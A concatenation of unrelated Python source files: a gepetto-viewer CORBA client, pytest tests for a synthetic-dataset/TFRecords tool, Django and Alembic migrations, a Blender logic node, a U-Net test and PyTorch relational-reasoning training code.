raise CorbaError ('Failed to narrow the root context') name = [CosNaming.NameComponent ("gepetto", "viewer"), CosNaming.NameComponent ("corbaserver", "gui")] try: obj = self.rootContext.resolve (name) except CosNaming.NamingContext.NotFound: raise CorbaError ('Failed to find the service "gui"') try: client = obj._narrow (GraphicalInterface) except KeyError: raise CorbaError ('Invalid service name "gui"') if client is None: # This happens when stubs from client and server are not synchronized. 
raise CorbaError ( 'Failed to narrow client for service named "gui"') self.gui = client def initWithDirectLink (self, url): from .gepetto.corbaserver import GraphicalInterface obj = self.orb.string_to_object (url) client = obj._narrow(GraphicalInterface) if client is None: # This happens when stubs from client and server are not synchronized. raise CorbaError ( 'Failed to narrow client for service named "gui"') self.gui = client def __init__(self, clients = defaultClients, url = None, host = None, port = None): """ Initialize CORBA and create default clients. :param url: URL in the IOR, corbaloc, corbalocs, and corbanames formats. For a remote corba server, use url = "corbaloc:iiop::/NameService". If None, url is initialized with param host, or alternatively with _getIIOPurl :param host: if not None, url is set to = "corbaloc:iiop:" + str(host) + "/NameService" """ from omniORB import CORBA import sys self.orb = CORBA.ORB_init (sys.argv, CORBA.ORB_ID) if url is not None: try: self.initWithDirectLink (url) except CorbaError: pass if self.gui is None: self.initWithNameService (url) else: urlNameService = _getIIOPurl(service="NameService", host=host, port = port if port else 2809) urlGepettoGui = _getIIOPurl(service="gepetto-gui", host=host, port = port if port else 12321) try: self.initWithDirectLink (urlGepettoGui) except CorbaError as e: print(e) pass if self.gui is None: self.initWithNameService (urlNameService) # In the python interpreter of gepetto-gui, gui.createWindow # crashes for an obscure reason. This hack makes it work. try: from PythonQt.gepetto import MainWindow # At this point, we are in the python interpreter of gepetto-gui self.gui.createWindow = lambda x: MainWindow.instance().createView(x).windowID() except ImportError: # At this point, we are NOT in the python interpreter of gepetto-gui pass def _getIIOPurl (service="NameService", host=None, port=None): """ Returns "corbaloc:iiop::/NameService" where host and port are, in this order of priority: - GEPETTO_VIEWER_HOST, GEPETTO_VIEWER_PORT environment variables - /gepetto_viewer/host, /gepetto_viewer/port ROS parameters - use default values ("localhost", 2809) """ _host = "localhost" _port = 2809 import os try: import rospy # Check is ROS master is reachable. 
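# If a ROS master is reachable, the defaults above are overridden by the
# /gepetto_viewer/host and /gepetto_viewer/port ROS parameters; the
# GEPETTO_VIEWER_HOST / GEPETTO_VIEWER_PORT environment variables and the
# explicit host/port arguments are applied afterwards and therefore take
# precedence over the ROS parameters.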
if rospy.client.get_master().target is not None: _host = rospy.get_param("/gepetto_viewer/host", _host) _port = rospy.get_param("/gepetto_viewer/port", _port) except: pass _host = os.getenv ("GEPETTO_VIEWER_HOST", _host) _port = os.getenv ("GEPETTO_VIEWER_PORT", _port) if host: _host = host if port: _port = port if _host is None and _port is None: url = "corbaloc:iiop:" else: url = "corbaloc:iiop:{}:{}".format(_host, _port) return url + "/" + service """ Test functions for processing datasets: generate, transform and explore; """ import os import re import argparse import tempfile from pathlib import Path import pytest from squids.dataset.maker import create_dataset from squids.tfrecords.maker import ( create_tfrecords, CategoriesMap, InvalidDatasetFormat, ) from squids.tfrecords.loader import load_tfrecords from squids.tfrecords.explorer import explore_tfrecords from squids.actions import generate, transform, explore from squids.tfrecords.errors import DirNotFoundError, IdentifierNotFoundError from squids.config import ( IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, BATCH_SIZE, NUM_DETECTING_OBJECTS, ) # ------------------------------------------------------------------------------ # Helper Functions # ------------------------------------------------------------------------------ def validate_csv_generator(dataset_dir): assert set(os.listdir(dataset_dir)) == set( [ "images", "instances_train.csv", "instances_test.csv", "instances_val.csv", "categories.json", ] ) assert len(os.listdir(dataset_dir / "images")) == 1000 def validate_coco_generator(dataset_dir): assert set(os.listdir(dataset_dir)) == set( [ "annotations", "instances_train", "instances_val", "instances_test", ] ) assert set(os.listdir(dataset_dir / "annotations")) == set( [ "instances_train.json", "instances_val.json", "instances_test.json", ] ) assert len(os.listdir(dataset_dir / "instances_train")) > 0 assert len(os.listdir(dataset_dir / "instances_val")) > 0 assert len(os.listdir(dataset_dir / "instances_test")) > 0 def validate_transformer(tfrecords_dir): assert set(os.listdir(tfrecords_dir)) == set( ["instances_train", "instances_test", "instances_val"] ) assert len(os.listdir(tfrecords_dir / "instances_train")) > 0 assert len(os.listdir(tfrecords_dir / "instances_val")) > 0 assert len(os.listdir(tfrecords_dir / "instances_test")) > 0 def validate_tfrecords_stdout(stdout, kind): assert re.search( f".*instances_{kind}", stdout, ) assert ( len( re.findall( "\\d+\\s\\{(1|2|3|1, 2|1, 3|2, 3|1, 2, 3)\\}", stdout, ) ) > 1 ) assert re.search( "Total\\s\\d+\\srecords", stdout, ) def validate_tfrecords_artifacts(record_ids, record_summaries): assert type(record_ids) == list assert type(record_summaries) == list assert len(record_ids) > 0 assert len(record_summaries) > 0 assert len(record_ids) == len(record_summaries) for record_id, record_summary in zip(record_ids, record_summaries): assert record_id >= 0 assert len(record_summaries) > 0 assert re.search( "\\{(1|2|3|1, 2|1, 3|2, 3|1, 2, 3)\\}", str(set(record_summary)), ) def validate_no_tfrecords(stdout): assert re.search( "No\\stfrecords\\shas\\sfound", stdout, ) def validate_tfrecord_stdout(stdout, image_id, image_output_dir): # Tests a record summary. 
assert re.search("Property\\s+Value", stdout) assert re.search(f"image_id\\s+{image_id}", stdout) assert re.search("image_size\\s+\\(\\d+, \\d+\\)", stdout) assert re.search("number_of_objects\\s+\\d+", stdout) assert re.search("available_categories\\s+\\{[\\d+(,\\s)?]+\\}", stdout) assert re.search( f"Image saved to {str(image_output_dir)}/{image_id}.png", stdout ) # Tests a record image. assert Path(image_output_dir / f"{image_id}.png").exists() def validate_tfrecord_artifacts(record_summary, record_image, image_id): # Tests a record summary. assert type(record_summary) == dict assert record_summary["image_id"] == image_id assert re.search("\\d+", str(record_summary["image_id"])) assert re.search("\\(\\d+, \\d+\\)", str(record_summary["image_size"])) assert re.search("\\d+", str(record_summary["number_of_objects"])) assert re.search( "\\{(\\d+(,\\s)?)+\\}", str(record_summary["available_categories"]) ) # Tests a record image. assert record_image is not None assert record_image.size == (64, 64) # ------------------------------------------------------------------------------ # GTE Function Tests # ------------------------------------------------------------------------------ def core_function_testscript(coco): """Tests generate/transform/explore functions.""" with tempfile.TemporaryDirectory() as tmp_dir: # ----------------------------- # Generates and checks dataset. # ----------------------------- dataset_dir = Path(tmp_dir + "/synthetic") dataset_dir.mkdir() # this tests code which deletes old dataset; create_dataset(dataset_dir, coco=coco, random_state=42) if coco: validate_coco_generator(dataset_dir) else: validate_csv_generator(dataset_dir) # ------------------------------------ # Transforms dataset to the TFRecords. # ------------------------------------ tfrecords_dir = Path(tmp_dir + "/synthetic-tfrecords") tfrecords_dir.mkdir() # this tests code which deletes old TFRecords; create_tfrecords(dataset_dir) validate_transformer(tfrecords_dir) # ------------------- # Explores TFRecords. # ------------------- image_id = None for kind in ["train", "val", "test"]: record_ids, record_summaries = explore_tfrecords( Path(tmp_dir + f"/synthetic-tfrecords/instances_{kind}"), return_artifacts=True, ) validate_tfrecords_artifacts(record_ids, record_summaries) # Grabs image ID for exploring individual records. if kind == "train": image_id = record_ids[0] with pytest.raises(DirNotFoundError): record_summaries = explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_xxx"), return_artifacts=True, ) # ------------------------- # Explores single TFRecord. # ------------------------- assert image_id is not None record_image, record_summary = explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_train"), image_id, tfrecords_dir, return_artifacts=True, ) validate_tfrecord_artifacts(record_summary, record_image, image_id) with pytest.raises(DirNotFoundError): explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_xxx"), image_id, tfrecords_dir, return_artifacts=True, ) with pytest.raises(DirNotFoundError): explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_train"), image_id, tfrecords_dir / "xxx", return_artifacts=True, ) with pytest.raises(IdentifierNotFoundError): explore_tfrecords( Path(tmp_dir + "/synthetic-tfrecords/instances_train"), 999999, tfrecords_dir, return_artifacts=True, ) # Tests an action for removing the "/synthetic" directory. 
with tempfile.TemporaryDirectory() as tmp_dir: dataset_dir = Path(tmp_dir + "/synthetic") dataset_dir.mkdir() create_dataset(dataset_dir) # Tests a reaction for missing directory with pytest.raises(DirNotFoundError): dataset_dir = Path(tmp_dir + "/synthetic") create_tfrecords(dataset_dir) # Tests a reaction for missing directory with pytest.raises(DirNotFoundError): dataset_dir = Path(tmp_dir + "/synthetic") create_dataset(dataset_dir, coco=coco) tfrecords_dir = Path(tmp_dir + "/somewhere/synthetic") create_tfrecords(dataset_dir, tfrecords_dir) def test_csv_generator_transformer_explore_functions(): """Tests the CSV data generate/transform/explore functions.""" core_function_testscript(coco=False) def test_coco_generator_transformer_explore_functions(): """Tests the CSV data generate/transform/explore functions.""" core_function_testscript(coco=True) # ------------------------------------------------------------------------------ # GTE Action Tests # ------------------------------------------------------------------------------ def core_action_testscript(capsys, coco): """Tests generate/transform/explore actions.""" parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() generate(subparsers) transform(subparsers) explore(subparsers) with tempfile.TemporaryDirectory() as tmp_dir: # Defines output directory. output_dir = Path(tmp_dir + "/output") output_dir.mkdir() # ----------------------------- # Generates and checks dataset. # ----------------------------- dataset_dir = Path(tmp_dir + "/synthetic") if coco: args = parser.parse_args( ["generate", str(dataset_dir), "--coco", "-v"] ) args.func(args) validate_coco_generator(dataset_dir) else: args = parser.parse_args(["generate", str(dataset_dir), "-v"]) args.func(args) validate_csv_generator(dataset_dir) # ---------------------------------------- # Transforms CSV dataset to the TFRecords. # ---------------------------------------- tfrecords_dir = Path(tmp_dir + "/synthetic-tfrecords") args = parser.parse_args( ["transform", str(dataset_dir), str(tfrecords_dir), "-v"] ) args.func(args) validate_transformer(tfrecords_dir) # ------------------- # Explores TFRecords. # ------------------- for kind in ["train", "val", "test"]: args = parser.parse_args( [ "explore", str(tfrecords_dir / f"instances_{kind}"), ] ) args.func(args) stdout, _ = capsys.readouterr() validate_tfrecords_stdout(stdout, kind) # Grabs image ID for exploring individual records. if kind == "train": image_id = re.search( "(\\d+)\\s\\{(1|2|1,2|1,3|2,3|1,2,3)\\}", stdout, ).group(1) # ------------------------- # Explores single TFRecord. 
# ------------------------- assert image_id is not None args = parser.parse_args( [ "explore", str(tfrecords_dir / "instances_train"), image_id, str(output_dir), ] ) args.func(args) stdout, _ = capsys.readouterr() validate_tfrecord_stdout(stdout, image_id, output_dir) def test_csv_generator_transformer_explore_actions(capsys): """Tests the CSV data generate/transform/explore functions.""" core_action_testscript(capsys, coco=False) def test_coco_generator_transformer_explore_actions(capsys): """Tests the CSV data generate/transform/explore functions.""" core_action_testscript(capsys, coco=True) # ------------------------------------------------------------------------------ # Other Tests # ------------------------------------------------------------------------------ def test_categories_map(): categories_map = CategoriesMap([]) assert categories_map[1] == 1 assert categories_map[2] == 2 assert 2 in categories_map categories_map = CategoriesMap([3, 4]) assert categories_map[3] == 1 assert categories_map[4] == 2 assert 4 in categories_map assert 5 not in categories_map def test_no_tfrecords_found(capsys): """Tests no TFRecords found.""" parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() explore(subparsers) with tempfile.TemporaryDirectory() as tmp_dir: tfrecords_dir = Path(tmp_dir) args = parser.parse_args(["explore", str(tfrecords_dir)]) args.func(args) stdout, _ = capsys.readouterr() validate_no_tfrecords(stdout) def test_unknown_transformation(): """Tests transform of an unknown dataset type.""" with tempfile.TemporaryDirectory() as tmp_dir: # Generates and checks CSV dataset dataset_dir = Path(tmp_dir + "/synthetic") dataset_dir.mkdir() with pytest.raises(InvalidDatasetFormat): dataset_dir = Path(tmp_dir + "/synthetic") # The dataset_dir does not contain either CSV or COCO data. 
create_tfrecords(dataset_dir) def test_reproducibility(): """Tests generate/transform/explore functions.""" def read_data(dataset_dir, filename): with open(dataset_dir / filename, "r") as file: return file.read() with tempfile.TemporaryDirectory() as tmp_dir: dataset_orig_dir = Path(tmp_dir + "/synthetic_orig") create_dataset(dataset_orig_dir, dataset_size=100, random_state=42) dataset_same_dir = Path(tmp_dir + "/synthetic_same") create_dataset(dataset_same_dir, dataset_size=100, random_state=42) dataset_diff_dir = Path(tmp_dir + "/synthetic_diff") create_dataset(dataset_diff_dir, dataset_size=100, random_state=None) for kind in ["train", "val", "test"]: expected = read_data(dataset_orig_dir, f"instances_{kind}.csv") actual_same = read_data(dataset_same_dir, f"instances_{kind}.csv") actual_diff = read_data(dataset_diff_dir, f"instances_{kind}.csv") assert actual_same == expected assert actual_diff != expected with tempfile.TemporaryDirectory() as tmp_dir: dataset_orig_dir = Path(tmp_dir + "/synthetic_orig") create_dataset( dataset_orig_dir, dataset_size=100, random_state=42, coco=True ) dataset_same_dir = Path(tmp_dir + "/synthetic_same") create_dataset( dataset_same_dir, dataset_size=100, random_state=42, coco=True ) dataset_diff_dir = Path(tmp_dir + "/synthetic_diff") create_dataset( dataset_diff_dir, dataset_size=100, random_state=None, coco=True ) for kind in ["train", "val", "test"]: expected = read_data( dataset_orig_dir, f"annotations/instances_{kind}.json" ).replace("_orig", "") actual_same = read_data( dataset_same_dir, f"annotations/instances_{kind}.json" ).replace("_same", "") actual_diff = read_data( dataset_diff_dir, f"annotations/instances_{kind}.json" ).replace("_diff", "") # Removes time stamps. expected = re.sub( r"\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2}", "", expected ) actual_same = re.sub( r"\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2}", "", actual_same ) actual_diff = re.sub( r"\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2}", "", actual_diff ) assert actual_same == expected assert actual_diff != expected # ------------------------------------------------------------------------------ # Data Loader Tests # ------------------------------------------------------------------------------ def test_data_loader(capsys): """Tests data loader for model for training and validation.""" with tempfile.TemporaryDirectory() as tmp_dir: dataset_dir = Path(tmp_dir + "/synthetic") tfrecords_dir = Path(tmp_dir + "/synthetic-tfrecords") create_dataset(dataset_dir) create_tfrecords(dataset_dir) # ------------------------------------ # Tests checkers for loader arguments. 
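# The checks below exercise load_tfrecords' validation of the output_schema
# argument: the schema must be non-empty, may contain each of the elements
# 'I', 'B', 'M' and 'C' at most once, must not contain two consecutive commas,
# and must not contain unknown elements. The subsequent tests then load data
# with a single output ("C"), a concatenated output ("BMC") and multi-output
# schemas ("I,BMC" and "B,C") and assert the resulting batch shapes.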
# ------------------------------------ with pytest.raises(ValueError, match="The output schema is empty."): load_tfrecords(tfrecords_dir, output_schema="") with pytest.raises( ValueError, match="The output schema contains multiple 'I'", ): load_tfrecords(tfrecords_dir, output_schema="II") with pytest.raises( ValueError, match="The output schema contains multiple 'B", ): load_tfrecords(tfrecords_dir, output_schema="BB") with pytest.raises( ValueError, match="The output schema contains multiple 'M", ): load_tfrecords(tfrecords_dir, output_schema="MM") with pytest.raises( ValueError, match="The output schema contains multiple 'C", ): load_tfrecords(tfrecords_dir, output_schema="CC") with pytest.raises( ValueError, match="The output schema contains two consequent commas.", ): load_tfrecords(tfrecords_dir, output_schema=",,") with pytest.raises( ValueError, match="The output schema contains unknown element 'X'.", ): load_tfrecords(tfrecords_dir, output_schema="X") # ---------------------------------- # Tests data load for single output. # ---------------------------------- dataset, steps_per_epoch = load_tfrecords( tfrecords_dir / "instances_train", output_schema="C", verbose=True ) assert steps_per_epoch > 0 for X, y in dataset: assert X.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert y.shape == (BATCH_SIZE, NUM_DETECTING_OBJECTS, 4) break # ---------------------------------------- # Tests data load for concatinated output. # ---------------------------------------- dataset, steps_per_epoch = load_tfrecords( tfrecords_dir / "instances_train", output_schema="BMC" ) assert steps_per_epoch > 0 for X, y in dataset: assert X.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert y.shape == ( BATCH_SIZE, NUM_DETECTING_OBJECTS, IMAGE_WIDTH * IMAGE_HEIGHT + 4 + 4, ) break # ---------------------------------------- # Tests data load for concatinated output. # ---------------------------------------- dataset, steps_per_epoch = load_tfrecords( tfrecords_dir / "instances_train", output_schema="I,BMC" ) assert steps_per_epoch > 0 for Xi, (Xo, y) in dataset: assert Xi.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert Xo.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert y.shape == ( BATCH_SIZE, NUM_DETECTING_OBJECTS, IMAGE_WIDTH * IMAGE_HEIGHT + 4 + 4, ) break dataset, steps_per_epoch = load_tfrecords( tfrecords_dir / "instances_train", output_schema="B,C" ) assert steps_per_epoch > 0 for Xi, (yb, yc) in dataset: assert X.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert yb.shape == (BATCH_SIZE, NUM_DETECTING_OBJECTS, 4) assert yc.shape == (BATCH_SIZE, NUM_DETECTING_OBJECTS, 4) break # Generated by Django 3.1.3 on 2020-11-16 14:50 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('projects', '0019_googlesheetssource'), ] operations = [ migrations.CreateModel( name='GithubRepo', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('refreshed', models.DateTimeField(auto_now=True, help_text='The date-time that this information was last refreshed from GitHub.')), ('full_name', models.CharField(help_text='The full name of the repository ie. 
owner/name', max_length=512)), ('image_url', models.URLField(help_text='The URL for an image associated with the repository.')), ('permissions', models.JSONField(help_text='A JSON object with permissions that the user has for the repo.')), ('updated', models.DateTimeField(help_text='The date-time that the repository was last updated.')), ('user', models.ForeignKey(help_text='The user who has access to the repository.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.AddConstraint( model_name='githubrepo', constraint=models.UniqueConstraint(fields=('user', 'full_name'), name='githubrepo_unique_user_full_name'), ), ] 1-10 import bpy from bpy.props import * from bpy.types import Node, NodeSocket from arm.logicnode.arm_nodes import * class RadToDegNode(Node, ArmLogicTreeNode): '''Radians to degrees node''' bl_idname = 'LNRadToDegNode' bl_label = 'Rad to Deg' bl_icon = 'QUESTION' def init(self, context): self.inputs.new('NodeSocketFloat', 'Radians') self.outputs.new('NodeSocketFloat', 'Degrees') add_node(RadToDegNode, category='Value') import tensorflow as tf import numpy as np from sciml_bench.benchmarks.slstr_cloud.model import unet def test_unet(): model = unet((128, 128, 2)) assert isinstance(model, tf.keras.Model) assert model.input_shape == (None, 128, 128, 2) assert model.output_shape == (None, 128, 128, 1) def test_unet_predict(): model = unet((128, 128, 2)) output = model.predict(np.random.random((1, 128, 128, 2))) assert output.shape == (1, 128, 128, 1) def test_unet_fit(): X = np.random.random((1, 128, 128, 2)) Y = np.random.randint(0, 1, size=(1, 128, 128, 1)) model = unet((128, 128, 2)) model.compile(loss='binary_crossentropy', optimizer='adam') history = model.fit(X, Y) assert isinstance(history, tf.keras.callbacks.History) 0 # Copyright (C) 2019 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 """ Remove title unique contraint from control model Create Date: 2019-02-26 12:49:13.358736 """ # disable Invalid constant name pylint warning for mandatory Alembic variables. # pylint: disable=invalid-name from alembic import op # revision identifiers, used by Alembic. 
revision = '7d10655e87f9' down_revision = '3b6acfd18e5c' def upgrade(): """Upgrade database schema and/or data, creating a new revision.""" op.drop_constraint('uq_t_controls', 'controls', type_='unique') def downgrade(): """Downgrade database schema and/or data back to the previous revision.""" raise NotImplementedError() # -*- coding: utf-8 -*- import torch from optim.pytorchtools import EarlyStopping import torch.nn as nn class RelationalReasoning(torch.nn.Module): def __init__(self, backbone, feature_size=64): super(RelationalReasoning, self).__init__() self.backbone = backbone self.relation_head = torch.nn.Sequential( torch.nn.Linear(feature_size*2, 256), torch.nn.BatchNorm1d(256), torch.nn.LeakyReLU(), torch.nn.Linear(256, 1)) def aggregate(self, features, K): relation_pairs_list = list() targets_list = list() size = int(features.shape[0] / K) shifts_counter=1 for index_1 in range(0, size*K, size): for index_2 in range(index_1+size, size*K, size): # Using the 'cat' aggregation function by default pos1 = features[index_1:index_1 + size] pos2 = features[index_2:index_2+size] pos_pair = torch.cat([pos1, pos2], 1) # (batch_size, fz*2) # Shuffle without collisions by rolling the mini-batch (negatives) neg1 = torch.roll(features[index_2:index_2 + size], shifts=shifts_counter, dims=0) neg_pair1 = torch.cat([pos1, neg1], 1) # (batch_size, fz*2) relation_pairs_list.append(pos_pair) relation_pairs_list.append(neg_pair1) targets_list.append(torch.ones(size, dtype=torch.float32).cuda()) targets_list.append(torch.zeros(size, dtype=torch.float32).cuda()) shifts_counter+=1 if(shifts_counter>=size): shifts_counter=1 # avoid identity pairs relation_pairs = torch.cat(relation_pairs_list, 0).cuda() # K(K-1) * (batch_size, fz*2) targets = torch.cat(targets_list, 0).cuda() return relation_pairs, targets def train(self, tot_epochs, train_loader, opt): patience = opt.patience early_stopping = EarlyStopping(patience, verbose=True, checkpoint_pth='{}/backbone_best.tar'.format(opt.ckpt_dir)) optimizer = torch.optim.Adam([ {'params': self.backbone.parameters()}, {'params': self.relation_head.parameters()}], lr=opt.learning_rate) BCE = torch.nn.BCEWithLogitsLoss() self.backbone.train() self.relation_head.train() epoch_max = 0 acc_max=0 for epoch in range(tot_epochs): acc_epoch=0 loss_epoch=0 # the real target is discarded (unsupervised) for i, (data_augmented, _) in enumerate(train_loader): K = len(data_augmented) # tot augmentations x = torch.cat(data_augmented, 0).cuda() optimizer.zero_grad() # forward pass (backbone) features = self.backbone(x) # aggregation function relation_pairs, targets = self.aggregate(features, K) # forward pass (relation head) score = self.relation_head(relation_pairs).squeeze() # cross-entropy loss and backward loss = BCE(score, targets) loss.backward() optimizer.step() # estimate the accuracy predicted = torch.round(torch.sigmoid(score)) correct = predicted.eq(targets.view_as(predicted)).sum() accuracy = (100.0 * correct / float(len(targets))) acc_epoch += accuracy.item() loss_epoch += loss.item() acc_epoch /= len(train_loader) loss_epoch /= len(train_loader) if acc_epoch>acc_max: acc_max = acc_epoch epoch_max = epoch early_stopping(acc_epoch, self.backbone) if early_stopping.early_stop: print("Early stopping") break if (epoch+1)%opt.save_freq==0: print("[INFO] save backbone at epoch {}!".format(epoch)) torch.save(self.backbone.state_dict(), '{}/backbone_{}.tar'.format(opt.ckpt_dir, epoch)) print('Epoch [{}][{}][{}] loss= {:.5f}; Epoch ACC.= {:.2f}%, Max ACC.= {:.1f}%, Max Epoch={}' 
\ .format(epoch + 1, opt.model_name, opt.dataset_name, loss_epoch, acc_epoch, acc_max, epoch_max)) return acc_max, epoch_max class RelationalReasoning_Intra(torch.nn.Module): def __init__(self, backbone, feature_size=64, nb_class=3): super(RelationalReasoning_Intra, self).__init__() self.backbone = backbone self.cls_head = torch.nn.Sequential( torch.nn.Linear(feature_size*2, 256), torch.nn.BatchNorm1d(256), torch.nn.LeakyReLU(), torch.nn.Linear(256, nb_class), torch.nn.Softmax(), ) def run_test(self, predict, labels): correct = 0 pred = predict.data.max(1)[1] correct = pred.eq(labels.data).cpu().sum() return correct, len(labels.data) def train(self, tot_epochs, train_loader, opt): patience = opt.patience early_stopping = EarlyStopping(patience, verbose=True, checkpoint_pth='{}/backbone_best.tar'.format(opt.ckpt_dir)) optimizer = torch.optim.Adam([ {'params': self.backbone.parameters()}, {'params': self.cls_head.parameters()}, ], lr=opt.learning_rate) c_criterion = nn.CrossEntropyLoss() self.backbone.train() self.cls_head.train() epoch_max = 0 acc_max=0 for epoch in range(tot_epochs): acc_epoch=0 acc_epoch_cls=0 loss_epoch=0 # the real target is discarded (unsupervised) for i, (data_augmented0, data_augmented1, data_label, _) in enumerate(train_loader): K = len(data_augmented0) # tot augmentations x_cut0 = torch.cat(data_augmented0, 0).cuda() x_cut1 = torch.cat(data_augmented1, 0).cuda() c_label = torch.cat(data_label, 0).cuda() optimizer.zero_grad() # forward pass (backbone) features_cut0 = self.backbone(x_cut0) features_cut1 = self.backbone(x_cut1) features_cls = torch.cat([features_cut0, features_cut1], 1) # score_intra = self.relation_head(relation_pairs_intra).squeeze() c_output = self.cls_head(features_cls) correct_cls, length_cls = self.run_test(c_output, c_label) loss_c = c_criterion(c_output, c_label) loss=loss_c loss.backward() optimizer.step() # estimate the accuracy loss_epoch += loss.item() accuracy_cls = 100. 
* correct_cls / length_cls acc_epoch_cls += accuracy_cls.item() acc_epoch_cls /= len(train_loader) loss_epoch /= len(train_loader) if acc_epoch_cls>acc_max: acc_max = acc_epoch_cls epoch_max = epoch early_stopping(acc_epoch_cls, self.backbone) if early_stopping.early_stop: print("Early stopping") break if (epoch+1)%opt.save_freq==0: print("[INFO] save backbone at epoch {}!".format(epoch)) torch.save(self.backbone.state_dict(), '{}/backbone_{}.tar'.format(opt.ckpt_dir, epoch)) print('Epoch [{}][{}][{}] loss= {:.5f}; Epoch ACC.= {:.2f}%, CLS.= {:.2f}%, ' 'Max ACC.= {:.1f}%, Max Epoch={}' \ .format(epoch + 1, opt.model_name, opt.dataset_name, loss_epoch, acc_epoch,acc_epoch_cls, acc_max, epoch_max)) return acc_max, epoch_max class RelationalReasoning_InterIntra(torch.nn.Module): def __init__(self, backbone, feature_size=64, nb_class=3): super(RelationalReasoning_InterIntra, self).__init__() self.backbone = backbone self.relation_head = torch.nn.Sequential( torch.nn.Linear(feature_size*2, 256), torch.nn.BatchNorm1d(256), torch.nn.LeakyReLU(), torch.nn.Linear(256, 1)) self.cls_head = torch.nn.Sequential( torch.nn.Linear(feature_size*2, 256), torch.nn.BatchNorm1d(256), torch.nn.LeakyReLU(), torch.nn.Linear(256, nb_class), torch.nn.Softmax(), ) # self.softmax = nn.Softmax() def aggregate(self, features, K): relation_pairs_list = list() targets_list = list() size = int(features.shape[0] / K) shifts_counter=1 for index_1 in range(0, size*K, size): for index_2 in range(index_1+size, size*K, size): # Using the 'cat' aggregation function by default pos1 = features[index_1:index_1 + size] pos2 = features[index_2:index_2+size] pos_pair = torch.cat([pos1, pos2], 1) # (batch_size, fz*2) # Shuffle without collisions by rolling the mini-batch (negatives) neg1 = torch.roll(features[index_2:index_2 + size], shifts=shifts_counter, dims=0) neg_pair1 = torch.cat([pos1, neg1], 1) # (batch_size, fz*2) relation_pairs_list.append(pos_pair) relation_pairs_list.append(neg_pair1) targets_list.append(torch.ones(size, dtype=torch.float32).cuda()) targets_list.append(torch.zeros(size, dtype=torch.float32).cuda()) shifts_counter+=1 if(shifts_counter>=size): shifts_counter=1 # avoid identity pairs relation_pairs = torch.cat(relation_pairs_list, 0).cuda() # K(K-1) * (batch_size, fz*2) targets = torch.cat(targets_list, 0).cuda() return relation_pairs, targets def run_test(self, predict, labels): correct = 0 pred = predict.data.max(1)[1] correct = pred.eq(labels.data).cpu().sum() return correct, len(labels.data) def train(self, tot_epochs, train_loader, opt): patience = opt.patience early_stopping = EarlyStopping(patience, verbose=True, checkpoint_pth='{}/backbone_best.tar'.format(opt.ckpt_dir)) optimizer = torch.optim.Adam([ {'params': self.backbone.parameters()}, {'params': self.relation_head.parameters()}, {'params': self.cls_head.parameters()}, ], lr=opt.learning_rate) BCE = torch.nn.BCEWithLogitsLoss() c_criterion = nn.CrossEntropyLoss() self.backbone.train() self.relation_head.train() self.cls_head.train() epoch_max = 0 acc_max=0 for epoch in range(tot_epochs): acc_epoch=0 acc_epoch_cls=0 loss_epoch=0 # the real target is discarded (unsupervised) for i, (data, data_augmented0, data_augmented1, data_label, _) in enumerate(train_loader): K = len(data) # tot augmentations x = torch.cat(data, 0).cuda() x_cut0 = torch.cat(data_augmented0, 0).cuda() x_cut1 = torch.cat(data_augmented1, 0).cuda() c_label = torch.cat(data_label, 0).cuda() optimizer.zero_grad() # forward pass (backbone) features = self.backbone(x) features_cut0 = 
self.backbone(x_cut0) features_cut1 = self.backbone(x_cut1) features_cls = torch.cat([features_cut0, features_cut1], 1) # aggregation function relation_pairs, targets = self.aggregate(features, K) # relation_pairs_intra, targets_intra = self.aggregate_intra(features_cut0, features_cut1, K) # forward pass (relation head) score = self.relation_head(relation_pairs).squeeze() c_output = self.cls_head(features_cls) correct_cls, length_cls = self.run_test(c_output, c_label) # cross-entropy loss and backward loss = BCE(score, targets) loss_c = c_criterion(c_output, c_label) loss+=loss_c loss.backward() optimizer.step() # estimate the accuracy predicted = torch.round(torch.sigmoid(score)) correct = predicted.eq(targets.view_as(predicted)).sum() accuracy = (100.0 * correct / float(len(targets))) acc_epoch += accuracy.item() loss_epoch += loss.item() accuracy_cls = 100. * correct_cls / length_cls acc_epoch_cls += accuracy_cls.item() acc_epoch /= len(train_loader) acc_epoch_cls /= len(train_loader) loss_epoch /= len(train_loader) if (acc_epoch+acc_epoch_cls)>acc_max: acc_max = (acc_epoch+acc_epoch_cls) epoch_max = epoch early_stopping((acc_epoch+acc_epoch_cls), self.backbone) if early_stopping.early_stop: print("Early stopping") break if (epoch+1)%opt.save_freq==0: print("[INFO] save backbone at epoch {}!".format(epoch)) torch.save(self.backbone.state_dict(), '{}/backbone_{}.tar'.format(opt.ckpt_dir, epoch)) print('Epoch [{}][{}][{}] loss= {:.5f}; Epoch ACC.= {:.2f}%, CLS.= {:.2f}%, ' 'Max ACC.= {:.1f}%, Max Epoch={}' \ .format(epoch + 1, opt.model_name, opt.dataset_name, loss_epoch, acc_epoch,acc_epoch_cls, acc_max, epoch_max)) return acc_max, epoch_max import torch import cv2 import numpy as np import logging import typing # NOTE: https://github.com/BoChenYS/BPnP # NOTE: https://arxiv.org/pdf/1909.06043.pdf log = logging.getLogger(__name__) 